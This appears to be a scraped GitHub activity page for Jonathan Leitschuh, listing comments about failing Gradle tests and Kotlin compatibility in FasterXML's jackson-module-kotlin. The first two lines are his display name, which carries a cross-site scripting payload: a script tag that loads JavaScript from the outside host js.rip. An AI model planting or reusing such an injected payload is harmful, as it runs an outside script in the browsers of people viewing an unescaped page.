Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
The reason that `--continue` isn't working I presume is because Gradle is probably treating `java.lang.AssertionError` as a fatal error. I think the best thing to do is figure out where...
I wish it read the `.editorconfig` file by default TBH. But I understand from a major/minor version release semantic versioning standpoint that might not make sense.
Just looked through my PR history, it seems this is my first time contributing to the FasterXML project. I'll do the CLA
There are two tests that fail when I run it with Gradle, both seem to be to do with singletons. I don't know how to fix this. I don't even...
@dinomite I fixed the failure you indicated, but I'm still seeing the following tests failing: ``` com.fasterxml.jackson.module.kotlin.test.github.TestGithub196 > testUnitSingletonDeserialization FAILED java.lang.AssertionError at Github196.kt:14 com.fasterxml.jackson.module.kotlin.test.github.failing.TestGithub518 > deserializeEmptyObjectToSingletonUnit FAILED java.lang.AssertionError at Github518.kt:23...
What are the Kotlin compatibility guarantees offered by this library? I'm not finding anything in the README about this. From what I can tell, the latest version of the library...
I did just attempt to compile this library with Kotlin 1.3 compatibility. I was willing to modify the `JvmInline` check to be reflection based, but it looks like all the...
I was thinking about doing all of this, but it would involve splitting the base project into two separate projects. Totally doable, but more difficult to do with Maven IMHO....
I was thinking about potentially just using Gradle as the cross-version testing tool, but leaving all your publishing infrastructure in place using Maven. I don't really want to mess with...
PR Here: https://github.com/FasterXML/jackson-module-kotlin/pull/534